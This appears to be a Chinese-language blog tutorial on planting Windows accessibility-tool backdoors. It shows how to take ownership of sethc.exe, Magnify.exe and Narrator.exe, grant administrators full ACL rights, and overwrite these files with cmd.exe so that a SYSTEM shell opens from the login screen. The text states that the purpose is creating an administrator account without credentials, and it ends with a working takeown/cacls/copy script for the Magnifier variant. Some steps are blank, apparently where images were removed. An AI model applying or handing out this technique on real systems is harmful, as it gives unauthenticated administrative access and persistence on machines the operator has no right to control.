Windows粘滞键后门

Windows粘滞键后门

原理：把sethc.exe粘滞键功能替换成cmd.exe的shell窗口，连续按5次shift键即可呼出cmd。

①粘滞键替换成cmd的基本应用

1、找到粘滞键应用所在的位置。

在C:/Windows/System32这个目录（系统进程的目录）下可找到粘滞键sethc这个应用程序（系统进程）。

2、备份要用到的文件

3、给要使用粘滞键的程序命名为sethc，但发现了这个问题

查看该文件的权限：

右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。

并且发现了只有TrustedInstaller这个系统管理员才有该完全控制权限：

4、修改文件所属者

是因为想修改文件名时提示我们需要管理员权限才可改名，那么现在将我们的权限给到管理员。（修改文件所属者）

（使用命令行的shell窗口修改）

5、复制sethc进程的文件，防止一下的操作出现问题

6、修改文件的访问控制列表(ACL)

出现这种情况的原因是：由于刚刚已经将权限给到管理员，但管理员的权限始终未变化，所以还是不能修改文件名称(提高)。

解决办法：

此时cmd和sethc都拥有了对相关文件的完全控制全：

修改文件名称成功：(使用copy命令会显示程序被占用，无法重命名操作)

7、测试

按五下shift键成功呼唤出cmd

此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建，并将该用户归入到管理员组当中，就可以实现没有用户信息即可登入设备的操作——粘滞键后门

粘滞键后门：本质是把注销界面中可以调出的应用切换程cmd（windows-shell）

②放大镜后门（Magnify.exe）

1、备份文件

2、修改文件所属者（由系统用户组改为administrators）

文件目录这里全写绝对路径，但依据当前环境是可以些相对路径的。因为cmd所在目录为系统目录，我们操作的环境也在系统目录上。

3、修改文件的访问控制列表（权限）

以下为效果图：

4、覆盖文件

5、测试

③讲述人后门（Narrator.exe）

1、备份文件

2、修改文件所属者（由系统用户组改为administrators）

3、修改文件的访问控制列表（权限）

以下为效果图：

4、覆盖文件

5、测试

④补充：以脚本的方式实现

copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.back
copy /Y C:\Windows\System32\Magnify.exe C:\Windows\System32\Magnify.back

takeown /F C:\Windows\System32\cmd.exe
takeown /F C:\Windows\System32\Magnify.exe

cacls C:\Windows\System32\cmd.exe /E /G administrators:F
cacls C:\Windows\System32\Magnify.exe /E /G administrators:F

copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Magnify.exe